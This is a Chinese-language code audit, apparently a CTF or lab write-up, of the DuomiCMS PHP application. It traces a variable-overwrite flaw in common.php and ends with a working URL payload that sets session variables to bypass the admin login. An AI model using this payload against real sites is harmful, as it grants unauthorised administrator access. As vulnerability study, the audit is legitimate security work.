https://blog.csdn.net/weixin_43415644/article/details/94064059
https://www.cnblogs.com/Qiuzhiyu/p/11923471.html
先查看index.php
require_once ("duomiphp/common.php");
require_once duomi_INC."/core.class.php";
//站点状态
在duomiphp/common.php的变量覆盖漏洞
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);
}
可以接受GET,POST,COOKIE这三种
foreach($_REQUEST as $_k=>$_v)
{
if( strlen($_k)>0 && m_eregi('^(cfg_|GLOBALS)',$_k) && !isset($_COOKIE[$_k]) )
{
exit('Request var not allow!');
}
}
有传参,正则匹配没有cfg_或GLOBALS,cookie没值
看它调用的函数,是对字符串进行转义
function _RunMagicQuotes(&$svar)
{
if(!get_magic_quotes_gpc())
{
if( is_array($svar) )
{
foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);
}
else
{
$svar = addslashes($svar);
}
}
return $svar;
}
get_magic_quotes_gpc — 获取当前 magic_quotes_gpc 的配置选项设置
当 magic_quotes_gpc=On 时,
如果输入的数据有单引号(’)、双引号(”)、反斜线()与 NUL(NULL 字符)等字符都会被加上反斜线。
当magic_quotes_gpc=Off 时,
系统不会自动对单引号(’)、双引号(”)、反斜线()与 NUL(NULL 字符)等字符增加反斜线,需要手工调用函数addslashes这个函数来为字符串增加转义。
查看login.php
require_once(dirname(__FILE__).'/../duomiphp/common.php');
require_once(duomi_INC."/check.admin.php");
去查看check.admin.php
var $keepUserIDTag = "duomi_admin_id";
var $keepgroupidTag = "duomi_group_id";
var $keepUserNameTag = "duomi_admin_name";
//php5构造函数
function __construct($admindir='')
{
global $admin_path;
if(isset($_SESSION[$this->keepUserIDTag]))
{
$this->userID = $_SESSION[$this->keepUserIDTag];
$this->groupid = $_SESSION[$this->keepgroupidTag];
$this->userName = $_SESSION[$this->keepUserNameTag];
}
需要给session传值,使用$_SESSION需要先调用session_start,在interface/comment.php下
session_start();
require_once("../duomiphp/common.php");
require_once(duomi_INC.'/core.class.php');
要找给session传的值,全局搜索groupid,在admin_manager.php找到需要等于1获得管理员权限
function getManagerLevel($groupid)
{
if($groupid==1){
return "系统管理员";
}else if($groupid==2){
return "网站编辑员";
}else{
return "未知类型";
}
}
interface/comment.php?_SESSION[duomi_group_id]=1&_SESSION[duomi_admin_id]=1&_SESSION[duomi_admin_name]=admin
去后台(默认/admin)可以直接登录